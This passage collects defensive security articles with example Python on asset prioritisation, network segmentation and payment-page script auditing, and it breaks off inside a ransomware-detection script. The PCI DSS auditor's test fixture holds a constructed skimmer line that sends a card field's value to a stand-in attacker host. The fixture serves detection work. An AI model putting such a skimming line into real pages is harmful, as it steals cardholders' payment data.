Securing Your Company’s Business-Critical Assets: A Strategic Approach

The concept of “critical assets” is probably not a new one for many. In the technology sector, the term refers to the important elements of your company’s IT infrastructure: think databases, application servers and privileged identities. If one of these is compromised, the consequences for your organization’s overall security can be significant.

But not all technology assets are critical assets. A delineation must also be made between a critical asset and a business-critical asset. So, what exactly are the risks to our business-critical assets? And, most importantly, how much do we know about those risks?

To grasp this topic fully, it’s important to recognize that business-critical assets are the technological backbone of your company. Yet, this is just one of the three pillars necessary for successful business operation. Organizations aiming for comprehensive cybersecurity governance must consider technology, business processes, and key employees. When these areas are taken into account, it becomes much easier to understand which resources are absolutely vital business-critical assets.

Why are Business-Critical Assets So Important?

In today’s world, every organization is grappling with a plethora of problems vying for solutions. But with numerous issues to address – whether it be CVEs, misconfigurations, or overly permissive identities – many organizations end up crippled by indecision, unsure of where to concentrate their efforts. Consequently, they might adopt what’s called a “cyber security spray ‘n pray approach,” which often ends in wasted time and resources. Instead of this broad, unfocused technique, organizations require a targeted effort towards the most crucial business-impacting issues.

Putting the spotlight on these business-impacting issues enhances resource allocation, efficiency, and effectiveness within an organization. More importantly, it encourages a tight focus on the issues that are of utmost concern to the senior leadership of the company. This means security teams are working hand-in-hand with senior management towards safeguarding the technological assets which support the most important business processes within their organization. The result? A tailored, business-centric cyber security approach with the highest return on investment.

Protecting Business-Critical Assets: A 4-step Method

Here’s a brief, four-step approach towards protecting your business-critical assets:

  1. Identify Business Processes: Start with a business risk assessment that will provide insight into your organization’s main business drivers and areas of greatest risk. If you have never done a risk assessment, consider adopting the “follow the money” approach, which focuses on how your company earns and spends money.
  2. Map Business Processes to Technology Assets: Once you’ve determined your most important business processes, establish a relationship between these processes and their underlying technology assets. These become your business-critical assets.
  3. Prioritize: Since you can’t fix everything, determining priorities is crucial. Ask “what are the top 3-5 business processes that are most important?” and consider feedback from company stakeholders and your risk management team.
  4. Implement Security Measures: After identifying and prioritizing company assets, the focus should shift to remediation activities. Typically, the outputs from your Vulnerability Management solution or recent Pen-test results will guide prioritization efforts for remediation.
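The four steps above can be carried as data rather than as a slide deck. The following is an added example, not code from the original article or its source: it assumes a criticality weight per business process (1 to 5), a mapping from each process to the technology assets that support it, and scanner or pen-test findings attached to those assets. Process names, host names, scores and weights are all constructed for illustration.

```python
"""Rank remediation work by business impact (added example, not from the article).

Model: each business process carries a criticality weight, each technology
asset supports one or more processes, and findings (from a scanner or a
pen-test) attach to assets. Names, weights and CVSS values are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Finding:
    asset: str
    title: str
    cvss: float            # CVSS base score, 0.0 - 10.0
    exploited: bool = False  # known exploitation in the wild


# Step 1: business processes and their criticality (1 = low, 5 = critical).
PROCESSES: Dict[str, int] = {
    "order-to-cash": 5,
    "payroll": 4,
    "marketing-site": 1,
}

# Step 2: map each process to the technology assets that support it.
PROCESS_ASSETS: Dict[str, List[str]] = {
    "order-to-cash": ["erp-db-01", "erp-app-01", "svc-erp-admin"],
    "payroll": ["hr-app-01"],
    "marketing-site": ["www-01"],
}


def asset_weight(asset: str) -> int:
    """Business weight of an asset: the highest criticality of any process it supports."""
    return max(
        (w for p, w in PROCESSES.items() if asset in PROCESS_ASSETS.get(p, [])),
        default=0,
    )


def business_critical_assets(min_weight: int = 4) -> List[str]:
    """Step 3: the assets backing the most critical processes."""
    return sorted({
        a for p, assets in PROCESS_ASSETS.items() for a in assets
        if PROCESSES[p] >= min_weight
    })


def prioritize(findings: List[Finding]) -> List[dict]:
    """Step 4: score = CVSS x process weight, doubled when exploited in the wild.

    Findings on assets not tied to any business process score 0 and sink to
    the bottom of the list, which is the point: they are not business-critical.
    """
    rows = []
    for f in findings:
        w = asset_weight(f.asset)
        score = f.cvss * w * (2 if f.exploited else 1)
        rows.append({"asset": f.asset, "finding": f.title, "weight": w,
                     "score": round(score, 1)})
    return sorted(rows, key=lambda r: r["score"], reverse=True)


# Constructed findings: note the highest CVSS does not come out on top.
SAMPLE_FINDINGS = [
    Finding("www-01", "Outdated CMS plugin", 9.8),
    Finding("erp-db-01", "Weak database listener ACL", 6.5),
    Finding("hr-app-01", "Missing MFA on admin portal", 7.5, exploited=True),
    Finding("lab-box-07", "Remote code execution", 9.8),  # mapped to no process
]

if __name__ == "__main__":
    for row in prioritize(SAMPLE_FINDINGS):
        print(row)
```

Run as-is, the critical-CVSS finding on the unmapped lab box ranks last while the MFA gap on the payroll portal ranks first; that inversion of a pure CVSS ordering is what the business mapping buys you. The weighting formula itself is an assumption to tune with your risk management team.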

Final Thoughts

Taking a more focused approach towards securing business-critical assets improves effectiveness and efficiency of security teams. Equally important, it fosters a stronger alignment with the priorities of senior leaders within the organization. With a robust understanding of what impacts your business most significantly, you can step away from unfocused, ineffective “security sprays” and start concentrating on what really matters to your company. This way, cybersecurity practice doesn’t just secure your technological assets, but contributes to the greater business strategy and its eventual success as a whole.


Related links:
https://thehackernews.com/2024/05/4-step-approach-to-mapping-and-securing.html

The Importance of Identity and Access Management in the Digital Age


Introduction

In today’s constantly evolving digital era, ensuring secure access to an organization’s sensitive information is paramount. Increasingly intricate business operations and the growing reliance on digital platforms to run them have made the understanding and implementation of Identity and Access Management (IAM) an essential part of an organization’s security measures. In this article, we look at what IAM is, why it is fundamental for enterprises, the key features of an IAM tool, and the challenges commonly faced during implementation.

What Is Identity and Access Management (IAM)?

Identity and Access Management is the collection of security services, procedures, policies, and tools that define and manage the roles and access rights of users, devices, and APIs across on-premises and cloud applications, servers, and services. IAM’s primary mission is to manage and control access to an organization’s sensitive data effectively. In simpler terms, IAM sits at the heart of digital transformation, cyber security, and regulatory compliance.

The Need For IAM in Enterprises

In most cyber-attacks targeting enterprise networks, identity is the initial entry point. Weak or missing multifactor authentication, the rise of impersonation-based attacks such as phishing and credential theft, and outdated IAM systems offer bad actors easy entry. Given the sharp increase in data breaches and cyber-attacks, implementing a solid IAM strategy is more crucial than ever. The role of IAM has evolved over time from a loose collection of security applications into a well-integrated fabric that consolidates architectures and processes into a coherent unit protecting the enterprise’s entire digital surface.

Challenges Faced During IAM Implementation

Providing access to business assets to which users and devices are entitled and keeping up with these rights as business needs evolve pose the most significant challenges to IAM. This process includes the timely onboarding and offboarding of users and devices, in addition to authorizing permissions. The rapid migration to remote work in the wake of the COVID-19 pandemic highlighted these challenges and the need for IAM systems and policies to adapt quickly. The growing complexity of workflows also necessitates custom IAM protection policies, resulting in a greater responsibility for IAM to manage everything.

Key Features of IAM

Primarily, IAM systems provide administrators with tools and technologies to change a user’s role, track user activities, create reports on these activities, and enforce policies on an ongoing basis. These systems ensure compliance with corporate policies and government regulations. The four fundamental elements of each IAM platform include user personal data storage, tools for managing this data, a system regulating and enforcing user access, and an auditing and reporting system.

Wrap Up

Identity and Access Management (IAM) is an essential part of an organization’s security strategy in the modern digital marketplace. While implementation of an IAM strategy can pose challenges, the benefits of successfully doing so significantly outweigh the potential difficulties. All organizations should consider a comprehensive review of their identity posture as a critical part of their cybersecurity planning.

Related links:
https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html

Maximizing AI Benefits Through Enhanced Information Management Strategies and Data Security


Introduction

Artificial Intelligence (AI) projects have transformed global industry operations with improved data processing and predictive analytics capabilities. However, concerns about security, data privacy, and integrity have led organizations to question their strategies before implementing AI technologies.

Main Section

The current landscape of AI implementation reveals conflicting perceptions among organizations about their readiness in using AI. Many organizations are grappling with challenges related to data quality, with about 52% facing such concerns. Furthermore, reportedly 45% of organizations have encountered unintended data exposures during their AI projects. Thus, the concerns around data privacy and integrity are valid and prevalent in the industry.

Such AI implementation challenges directly affect businesses’ information management (IM) strategies. According to a recent study, organizations with mature IM strategies are 1.5 times more likely to benefit from AI than those with less-developed strategies. However, fewer than half of these organizations are confident they can safely use AI, a stark contrast with their self-reported AI readiness.

In addition to internal data quality, organizations express concerns around data privacy and security: about 71% report such concerns prior to implementing AI. Another major challenge is maintaining an AI acceptable use policy. The lack of such a policy poses significant risks, including loss of intellectual property and competitive advantage.

It is not surprising that 88% of organizations claim to have an IM strategy in place. But, surprisingly, 44% of them lack basic measures such as archiving, retention policies, and lifecycle management solutions. Furthermore, just 29% of organizations automate most aspects of their IM strategy. As data volume grows, the need for stronger IM strategies becomes crucial. An overwhelming 64% of organizations manage over a petabyte of data, and 41% handle more than 500 petabytes of data.

Summary

In conclusion, security concerns continue to hold back AI projects in many organizations. To use AI technology productively, organizations need to address these challenges promptly. By improving their IM strategies and ensuring robust data privacy and security measures are in place, they can reap the full benefits of AI. As more organizations recognize that their strategies must keep pace with AI, this is a promising step in the right direction.

Related links:
https://www.csoonline.com/article/2079619/security-concerns-could-be-holding-back-ai-projects.html

Effective Strategies for CISOs in the Digital Age


Introduction

A successful Chief Information Security Officer (CISO) must function as a business enabler, with a significant impact on both the effectiveness and the security of the organization. Implementing security initiatives without considering their repercussions on the business is a grave mistake many CISOs make. CISOs must work hand-in-hand with the business, not against it, since each industry sector has unique attributes and therefore requires tailored security solutions.

How to be a Successful CISO and Business Enabler

Here are some tips on how to serve as a successful CISO and enable your business to thrive in an increasingly digital world.

1. Develop a Strategy

To begin, a successful CISO should formulate a clear business-aligned security strategy and policy framework. The policy must be tailor-made for the organization and abide by relevant standards, regulations, and internal requirements. It’s crucial to integrate the strategy with the business objectives and the organizational culture.

2. Create Security Committee

An efficient security governance mechanism is established by creating a security committee involving representatives from all sectors of the company. At the very least, the committee should discuss strategies, policies, initiatives, issues, and incidents.

3. Constitute Virtual Security Team

Give all employees an easy way to share their opinions and suggestions on security. Hold regular meetings to discuss security issues and make sure every department is represented.

4. Key Messages Directly from CISO

If possible, personally train and educate all new hires (and existing employees) on company policies and the direction of information security, making sure everyone appreciates the importance of securing business data.

5. Automate Processes

Successful CISOs also aim to reduce dependency on individual users. Automate as many processes as possible so that company security holds regardless of user mistakes or misuse.

6. Identify and Address Business Pain Areas

It’s vital to identify the pain areas of the business, which might be due to weak security policies or lack of adequate services. Efficient controls should be brought into place to address these issues and introduce faster and more efficient services.

7. Get User Buy-in

Make it a habit for the Information Security team not to dismiss requested changes to policies out of hand. Always perform a cost-benefit analysis before making a decision and offer alternative solutions whenever possible.

Conclusion

A successful CISO secures buy-in from the business by ensuring all employees understand why a particular policy is essential for them and for the company. This means recognising that the Information Security function is not merely a technical role but a partner to the business and its stakeholders.
The success of security initiatives largely depends on support from top to bottom within the organization. A successful CISO and a stable business both follow from the right processes, awareness, and buy-in from all stakeholders.


Related Links: https://securereading.com/effective-ciso-enables-business/

Securing the Cloud: Best Practices and Guidelines

Understanding and Implementing Cloud Security Practices

In an era where digital technology and innovation seem ubiquitous, cloud services have gained considerable traction with enterprises across various sectors of the economy. These services provide applications, storage, and managed servers, substantially reducing the burden on corporate entities to manage their infrastructure.

In view of the widespread adoption of cloud services, the Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) have jointly released a series of bulletins outlining best practices for securing cloud environments.

Cloud Security Guidelines

The five CISA and NSA documents each cover one area:

  1. Identity and access management
  2. Key management
  3. Network segmentation and encryption in cloud environments
  4. Securing data in the cloud
  5. Mitigating risks from managed service providers

The recommendations range from guidance on configuring Multi-Factor Authentication (MFA), encrypting data at rest, and backup and recovery plans, to securing the corporate accounts used by Managed Service Providers (MSPs). These bulletins offer insights that can benefit both cybersecurity professionals and IT executives.

Assessing the Threat Landscape

Cloud services have increasingly become targets for threat actors because of the valuable data these platforms store. They also serve as potential gateways into internal networks, which makes them critical targets. A Microsoft report in 2021 highlighted a surge in attacks by Nobelium, the Russian state-sponsored threat actor behind the SolarWinds compromise, which targeted cloud service providers and resellers in order to reach their downstream customers.

In response to these emerging threats, CISA released a tool named the ‘Untitled Goose Tool,’ which enhances cybersecurity defenses by extracting telemetry data from Azure Active Directory, Microsoft Azure, and Microsoft 365 environments.

In Conclusion

As cyber threats evolve and become more sophisticated, organizations must strive to stay ahead through the constant implementation and review of cloud security practices. Taking advantage of best-practice recommendations from agencies like CISA and NSA can play a critical role in navigating this challenging cybersecurity landscape.



Related links:

https://www.bleepingcomputer.com/news/security/cisa-nsa-share-best-practices-for-securing-cloud-services/
https://media.defense.gov/2024/Mar/07/2003407866/-1/-1/0/CSI-CloudTop10-Identity-Access-Management.PDF
https://media.defense.gov/2024/Mar/07/2003407858/-1/-1/0/CSI-CloudTop10-Key-Management.PDF
https://media.defense.gov/2024/Mar/07/2003407861/-1/-1/0/CSI-CloudTop10-Network-Segmentation.PDF
https://media.defense.gov/2024/Mar/07/2003407862/-1/-1/0/CSI-CloudTop10-Secure-Data.PDF
https://media.defense.gov/2024/Mar/07/2003407859/-1/-1/0/CSI-CloudTop10-Managed-Service-Providers.PDF

Apple Devices Vulnerable: Study Reveals Shocking Reality of Malware Threats

Introduction

There’s a common belief, held by many Apple users, that their devices are immune to malware and attacks. However, a recent study conducted by Mobile Device Management firm, Jamf, warns this may not be the case. The report indicates that there’s a sense of complacency among macOS users when it comes to cyber hygiene, which is concerning given the intricate attack methods used by hackers today.

The study, Jamf’s annual “Security 360” report, covers the last quarter of 2023 and draws on data gathered from 15 million desktops, tablets, and smartphones across 90 countries.

According to Jamf’s findings, Mac Trojans, malware that masquerades as legitimate software to target Apple users, are on the rise, making up approximately 17% of all malware instances aimed at the platform. Jamf is currently tracking some 300 macOS malware families, 21 of them newly discovered in 2023. It is worth noting that these figures are still considerably lower than the volume of malicious software aimed at Windows and Android users.

Interestingly, one key issue that the report highlights is the lackluster update policy followed by many organizations. About 39% of the surveyed organizations were found to be running devices with known security flaws. It was also revealed that about 40% of mobile users have devices with similar security vulnerabilities.

Another alarming issue is the growing success rate of phishing attacks on mobile devices such as the iPhone. According to the report, phishing attempts are 50% more successful on these devices than on Macs.

The Threat of Third-Party App Stores

There’s an apparent danger lurking around Sideloading or third-party app stores, which are now becoming accessible on iPhones. Although the intent behind using these alternative app stores might seem harmless at face value, they are oftentimes filled with misleading apps that coax users into downloading suspicious applications.

Interestingly, the report also highlighted the fact that about 57% of the users are under the impression that macOS is immune to malware or refuse to believe otherwise. Clearly, these misconceptions and a misguided sense of security put users at a higher risk of cyber threats.

Conclusion

While the figures raised by this report might seem alarming, Jamf suggests that many of these problems can be resolved by practicing basic secure behaviors. Regular updates, strong passwords, and activating 2-Factor Authentication are some of the simple yet effective steps that can significantly enhance the security of a device. It’s also crucial that end-users are adequately educated about the vulnerability of their devices to fend off potential cyber attacks effectively.

Enhancing Cyber Security: Navigating Threats with SIEM and AI

Introduction

Today’s increasingly complex and diverse network landscape demands advanced tools to prevent, detect, and respond to cybersecurity threats. One such tool is Security Information and Event Management (SIEM) software. SIEM platforms play an integral role in any security operations program, making them invaluable assets in maintaining a healthy network environment.

Understanding SIEM and Its Value

Security Information and Event Management (SIEM) software collects log and event data from across the environment in order to detect, investigate, and respond to cyber threats. These platforms parse event logs and monitor security events, a task that is not glamorous but indispensable in an era shaped by automation and Artificial Intelligence (AI).

The true value of SIEM lies in the correlation of system events, categorizing them for priority and analysis and presenting critical events for immediate visibility and response. Mature SIEM systems improve this visibility significantly by escalating automatic alerts to response teams or executing automatic actions in response to alarm triggers.

How SIEM Works

Contemporary computing systems, including network devices, applications, operating systems, and cloud services, maintain event logs that carry information relevant to security monitoring and application performance. These event logs and related system data must be exported into the SIEM platform. Agents installed on the source systems commonly handle this, although much collection is agentless: network devices forward syslog, and cloud services expose their audit logs through APIs that the SIEM polls.

The choice of a SIEM system depends on aspects such as network topology, bandwidth, and the types of systems from which you need logs. Whichever SIEM is chosen, it is crucial that the whole infrastructure is configured to feed it, including both on-premises and cloud components; a log source that is not onboarded is a blind spot.

SIEM and AI-Enhancement

AI is increasingly playing an integral role in SIEM systems. It helps analyze vast volumes of data, delivering only useful information to the security operations center. SIEM platforms leverage correlation engines, AI, and machine learning to identify threat patterns and differentiate their offerings from competitors.

AI-enhanced SIEM systems draw on large cloud data feeds from many vendors and sources, using this accumulated knowledge to build deep contextual insight into event data without manual intervention. Such context is essential for triaging events, identifying attack chains, and formulating incident response plans. Bear in mind, however, that whether these AI features are available to you may depend on whether your SIEM runs in the cloud or on-premises.

Choosing a SIEM for Your Business

The process of identifying an ideal SIEM for your business can often include considerations such as the ability to support business-critical systems, enhancing threat detection, and integrating seamlessly with other security platforms. Other important factors to consider include the SIEM’s ability to comply with regulatory requirements, role-based access for security, alert configuration capabilities, and their practical options for log ingestion.

Ultimately, the final choice depends on several factors including cost, resource requirements, and business-specific needs.

Conclusion

Implementing a robust Security Information and Event Management (SIEM) system in your enterprise can help fortify your cybersecurity protocols. It’s a comprehensive solution that consolidates event data from multiple sources, correlates events, identifies anomalies and violations, and sends alerts. By understanding the functionality and key considerations when choosing a SIEM system, businesses can better equip themselves with more advanced defenses against evolving cybersecurity threats.



Related Links:

https://www.csoonline.com/article/524286/what-is-siem-security-information-and-event-management-explained.html

Guarding Against Adversaries: NSA’s Zero-Trust Guidance

An In-Depth Look at the NSA’s Zero-Trust Guidance to Guard Against Network Adversities

To bolster network security and hinder adversaries’ lateral movement, the National Security Agency (NSA) recommends that organizations adopt zero-trust principles. At its core, a zero-trust security architecture puts stringent controls on access to network resources, whether they sit inside or beyond the physical perimeter. This limits the impact of a breach as well as keeping the network protected.

The Zero-Trust Framework

Unlike the traditional IT security model, where everyone and everything within the network perimeter is trusted, the zero-trust architecture operates on the premise that a threat may already be lurking inside. Hence, it denies unrestricted access to the network, keeping potential risks at bay.

A key aspect of enhancing the zero-trust maturity involves addressing several elements, known as pillars, which threat actors could potentially exploit. One such pillar is the network and environment component, encompassing all hardware, software assets, non-person entities, and inter-communication protocols. The NSA released its detailed zero-trust guidance catered towards this pillar.

Seven Pillars of the Zero-Trust Architecture

The NSA’s zero-trust model is organized around seven pillars: user, device, network and environment, application and workload, data, visibility and analytics, and automation and orchestration. For each pillar, organizations must attain a specific level of maturity, in line with zero-trust principles, to advance their security posture. Within the network and environment pillar, the guidance is delivered through methods such as data flow mapping, macro and micro segmentation, and software-defined networking.

Data flow mapping involves identifying where data is stored and processed and how it moves across the network, so that the segmentation policy can be written from real traffic rather than assumptions. Macro and micro segmentation then limit lateral movement: macro segmentation creates dedicated network areas for different departments or functions, while micro segmentation breaks those areas down into smaller, individually controlled components.

Micro Segmentation in the Zero-Trust Framework

The zero-trust framework uses micro segmentation to further reduce the attack surface and limit the potential breach impact. It involves isolating users, applications, or workflows into individual network segments with strict access policies to limit lateral data flows.

Acquiring more granular control over micro segmentation is feasible through software-defined networking (SDN) components, enabling customizable security monitoring and alerting. SDN enhances network visibility and allows the enforcement of policies across all network segments from a centralized control center.
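The following is an added example, not code from the NSA guidance or the article, showing the two ideas above in working form: a data-flow map built from observed flow records, and a default-deny segmentation policy checked against the same records. The segment names, address ranges, policy entries and flow records are constructed; in practice the flows would come from firewall or SDN controller logs.

```python
"""Default-deny segmentation policy checked against observed flows (added example).

Segment names, address ranges, the policy and the flow records are
constructed for illustration; a real deployment would feed this from
firewall or SDN controller flow logs."""
import ipaddress
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Macro segmentation: which address range belongs to which segment.
SEGMENTS = {
    "workstations": ipaddress.ip_network("10.10.0.0/16"),
    "app": ipaddress.ip_network("10.20.0.0/24"),
    "db": ipaddress.ip_network("10.30.0.0/24"),
    "mgmt": ipaddress.ip_network("10.99.0.0/24"),
}

# Explicit allow list of (source segment, destination segment, port).
# Anything not listed is denied, including traffic within a segment,
# which is what micro segmentation adds on top of the macro layout.
POLICY: Set[Tuple[str, str, int]] = {
    ("workstations", "app", 443),
    ("app", "db", 5432),
    ("mgmt", "app", 22),
    ("mgmt", "db", 22),
}


def segment_of(ip: str) -> str:
    """Resolve an address to its segment name; 'unknown' if it is in no segment."""
    addr = ipaddress.ip_address(ip)
    for name, net in SEGMENTS.items():
        if addr in net:
            return name
    return "unknown"


def data_flow_map(flows: List[str]) -> Dict[Tuple[str, str], Set[int]]:
    """Data flow mapping: which segments talk to which, and on what ports."""
    m: Dict[Tuple[str, str], Set[int]] = defaultdict(set)
    for line in flows:
        src, dst, port = line.split(",")
        m[(segment_of(src), segment_of(dst))].add(int(port))
    return dict(m)


def violations(flows: List[str]) -> List[str]:
    """Flows the segmentation policy would not permit (default deny)."""
    bad = []
    for line in flows:
        src, dst, port = line.split(",")
        if (segment_of(src), segment_of(dst), int(port)) not in POLICY:
            bad.append(line)
    return bad


# Constructed flow records in the form src_ip,dst_ip,dst_port.
FLOWS = [
    "10.10.4.21,10.20.0.5,443",    # workstation -> app over HTTPS: allowed
    "10.20.0.5,10.30.0.9,5432",    # app -> db: allowed
    "10.10.4.21,10.10.7.3,3389",   # workstation -> workstation RDP: lateral movement
    "10.10.4.21,10.30.0.9,5432",   # workstation straight to db: bypasses app tier
    "10.99.0.2,10.30.0.9,22",      # admin SSH from mgmt: allowed
]

if __name__ == "__main__":
    for pair, ports in sorted(data_flow_map(FLOWS).items()):
        print(f"{pair[0]:>12} -> {pair[1]:<12} ports={sorted(ports)}")
    print("violations:", violations(FLOWS))
```

The two flagged records are exactly the ones a perimeter firewall never sees: one is workstation-to-workstation RDP inside a single segment, the other skips the application tier to reach the database directly. Running the map before the policy is the practical order, since the map tells you which legitimate flows the allow list must contain before you switch to default deny.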

Building A Zero-Trust Environment

Designing and building a zero-trust environment may seem like a significant undertaking, requiring systematic progression through multiple maturity stages. However, if executed properly, the end result is a robust enterprise architecture capable of identifying, resisting, and responding to threats attempting to exploit network weaknesses.

The NSA’s first guide for the zero-trust framework was introduced in February 2021, followed by another guidance provided in April 2023, dedicated to fostering the maturity of the user component within the zero-trust framework.

Conclusion

As enterprises hasten to secure their networks in an increasingly hostile digital landscape, the zero-trust framework offers an appealing strategy. By trusting nothing and validating everything, organizations can significantly reduce, if not eradicate, the risk presented by latent threats. The NSA’s comprehensive zero-trust guidelines provide a roadmap for companies looking to bolster their network security and protect their assets.



Related links:

https://www.bleepingcomputer.com/news/security/nsa-shares-zero-trust-guidance-to-limit-adversaries-on-the-network/
https://media.defense.gov/2024/Mar/05/2003405462/-1/-1/0/CSI-ZERO-TRUST-NETWORK-ENVIRONMENT-PILLAR.PDF

Enhancing Cybersecurity with PCI DSS 4.0

Introduction

When it comes to cybersecurity, compliance may not be the most eye-catching topic, yet it is undoubtedly significant. In the current digital age, security teams play a vital role in Governance, Risk, and Compliance (GRC) concerns thereby warranting their due recognition in any security organization’s objectives and priorities.

Notably, various compliance standards and frameworks have recently adopted requirements that echo security best practices rather than mere checkboxes, which makes the case for PCI DSS 4.0, the newest version of the payment card standard, all the stronger. Let’s look at its facets and what security professionals can learn from the changes.

The Noteworthiness of PCI DSS 4.0

The Payment Card Industry Security Standards Council (PCI SSC), made up of the main card brands Visa, Mastercard, American Express, Discover, JCB International, and UnionPay, sets and administers the standard. Under it, every entity that accepts card payments must protect cardholder data, so any business handling card payments must adhere to PCI DSS 4.0, which was published in March 2022 with a two-year transition period. From March 31, 2024, onwards, PCI DSS 4.0 is the sole active version of the standard. Note that a number of the new requirements are marked as future-dated and remain best practice until March 31, 2025, after which they become mandatory.

Security Aspects of the PCI DSS 4.0 Standard

Let’s focus on some of the most prominent changes in v4.0, particularly concerning us as security professionals:

Avoidance of Malicious Scripts

With an increasing number of attacks and fraud incidents involving malicious third-party scripts, PCI DSS 4.0 adds specific requirements for managing payment page scripts and for deploying mechanisms to detect skimming: Requirement 6.4.3 calls for an inventory of all scripts on payment pages, with written justification and a method to assure their integrity, and Requirement 11.6.1 calls for a change- and tamper-detection mechanism on the payment page itself. In practice, businesses need to know exactly which scripts their payment pages load, confirm that none are unauthorized, and monitor those scripts for unexpected changes.
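As an added example (not code from the article or from the PCI SSC), the following models the intent of those two requirements: it parses a payment page for external scripts, compares what the page loads against an authorized inventory of Subresource Integrity (SRI) hashes, and flags scripts that are unauthorized, that have changed since they were approved, or that the page loads without pinning the hash. The page HTML, the inventory, and the fetched script bodies are constructed fixtures; a real monitor would fetch the live page and scripts on a schedule.

```python
"""Payment-page script inventory and tamper check (added example).

Models the intent of PCI DSS v4.0 requirements 6.4.3 (authorized script
inventory with integrity assurance) and 11.6.1 (detect unauthorized changes
to the payment page). All HTML, script bodies and URLs are constructed."""
import base64
import hashlib
from html.parser import HTMLParser
from typing import Dict, List, Tuple


class ScriptCollector(HTMLParser):
    """Collect external <script src=...> URLs and their integrity attributes."""

    def __init__(self):
        super().__init__()
        self.scripts: List[Tuple[str, str]] = []  # (src, integrity or "")

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append((a["src"], a.get("integrity") or ""))


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value for a script body (sha384, accepted by browsers)."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


def audit_payment_page(html: str, inventory: Dict[str, str],
                       fetched: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Compare the scripts a page actually loads with the authorized inventory.

    inventory: src -> approved SRI hash (the 6.4.3 inventory record).
    fetched:   src -> script bytes as currently served (what a monitor downloaded).
    """
    p = ScriptCollector()
    p.feed(html)
    report = {"unauthorized": [], "tampered": [], "missing_sri": [], "ok": []}
    for src, integrity in p.scripts:
        if src not in inventory:
            report["unauthorized"].append(src)   # not in the approved inventory
            continue
        if sri_hash(fetched.get(src, b"")) != inventory[src]:
            report["tampered"].append(src)       # content changed since approval
            continue
        if integrity != inventory[src]:
            report["missing_sri"].append(src)    # page does not pin the hash
            continue
        report["ok"].append(src)
    return report


# Constructed fixtures: an approved checkout script that has since been
# modified on the server, a first-party helper loaded without SRI, and a
# script nobody approved.
CHECKOUT_JS = b"window.checkout = function () { /* tokenize card */ };"
ANALYTICS_JS = b"console.log('metrics');"
INVENTORY = {
    "https://pay.example/checkout.js": sri_hash(CHECKOUT_JS),
    "/static/analytics.js": sri_hash(ANALYTICS_JS),
}
PAGE = f"""<html><body>
<script src="https://pay.example/checkout.js" integrity="{INVENTORY['https://pay.example/checkout.js']}" crossorigin="anonymous"></script>
<script src="/static/analytics.js"></script>
<script src="https://cdn.example.net/skimmer.js"></script>
</body></html>"""
FETCHED = {
    "https://pay.example/checkout.js":
        CHECKOUT_JS + b"fetch('https://evil.example/?c=' + document.forms[0].card.value);",
    "/static/analytics.js": ANALYTICS_JS,
}

if __name__ == "__main__":
    for status, srcs in audit_payment_page(PAGE, INVENTORY, FETCHED).items():
        print(f"{status:>12}: {srcs}")
```

Two caveats a practitioner should keep in mind: a browser only enforces an integrity attribute on the script it fetches, so the inventory check above is what catches a script that was altered at its source, and a static parse of the HTML will not see scripts injected at runtime by another script, which is why 11.6.1 asks for detection on the page as rendered, not just on the HTML as served.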

Installation and Maintenance of Network Security Controls

The upgraded PCI DSS standard emphasizes the need for implementing and maintaining network security controls. It indicates that, in today’s complex network realm, securing your business entails devising a solution for network security concerns in hybrid and multi-cloud settings, preferably through a distributed cloud strategy.

Development and Maintenance of Secure Systems and Software

Requirement 6 of the updated standard hints towards the need for appropriate API security and the significance of a secure software development lifecycle (SSDLC). It further implies that businesses need to remain alert to system changes and ensure that these changes adhere to proper change control procedures. By securing APIs, businesses are ensuring a key aspect of modern business operations remains safeguarded.

Logging, Visibility, and Monitoring

Company logs need to be accessible across all environments, as detailed in Requirement 10 of the update. Every business must confirm that they have appropriate logging and monitoring capabilities across their hybrid and multicloud environments and use this visibility to monitor these areas for security, fraud, abuse, and compliance issues effectively.

Conclusion

The PCI DSS 4.0 update may focus on payment card security, but its importance extends far beyond that scope. It provides much needed, updated guidance to security teams amidst an evolving threat landscape and the increasing prevalence of hybrid and multicloud environments. By absorbing its learnings and implementing its recommendations, security professionals can significantly bolster their businesses’ safety measures.



Related Links:

https://www.darkreading.com/cybersecurity-operations/pci-dss-4-0-is-good-security-guidance-for-everyone

Inside the BlackCat Ransomware Attack: Strategies for Defense

Defending Against BlackCat: An Inside Look at a Ransomware Attack

In the continually evolving world of cybersecurity, ransomware is one of the most significant threats organizations face, and the attacks themselves keep evolving into more complex and devastating forms. Cybercriminals pursue a range of objectives, including data theft, fraud and identity theft, and exploit whatever vulnerabilities they find, so it is crucial for companies to understand the hallmarks of these attacks in order to formulate their defenses.

This article looks at a BlackCat ransomware attack as reported from the perspective of incident response experts at Sygnia. The victim, a company that had noticed suspicious activity on its network, engaged Sygnia, who diagnosed a ransomware attack in progress. Given the imminent danger, Sygnia recommended that the victim disconnect from the internet immediately to limit further damage.

The attacker was identified as BlackCat. This was a supply chain attack: the victim’s vendor was compromised first, and the attackers used that vendor’s access to reach the victim. Once inside the victim’s network they worked to consolidate their position, generating a good deal of noisy activity along the way.

The Anatomy of the BlackCat Ransomware Attack

The progress of the BlackCat attack was meticulously tracked by Sygnia’s experts. Initial attempts to access the victim’s network were made from the compromised vendor. The attackers tried Remote Desktop Protocol (RDP) and Server Message Block (SMB) logons to the victim’s servers. After a few successful logons, they moved on to brute-force authentication attacks.

Once the attacker successfully connected over RDP to a server on the victim’s network, it started using it as a ‘pivot server’ for reconnaissance and lateral movement. This action set off alerts regarding anomalous activities in the victim’s security controls, but they were initially dismissed due to the common issue of alert fatigue and possible false positives.
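The two behaviours described here, a burst of failed logons followed by a success and a single host then fanning out across the network, are exactly the kind of thing the SIEM correlation discussed earlier on this page exists to surface. The following is an added example, not code from Sygnia or the article, that runs both detections over a constructed, simplified feed of Windows Security events (4625 failed logon, 4624 successful logon; logon type 10 is RDP, type 3 is a network logon such as SMB). Host names, addresses, the user name and the thresholds are all assumptions.

```python
"""Correlating logon events into brute-force and pivot alerts (added example).

Input is a constructed, simplified feed of Windows Security events:
4625 = failed logon, 4624 = successful logon; logon type 10 = RDP,
3 = network (SMB), 2 = interactive. Hosts, addresses and thresholds
are assumptions for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta
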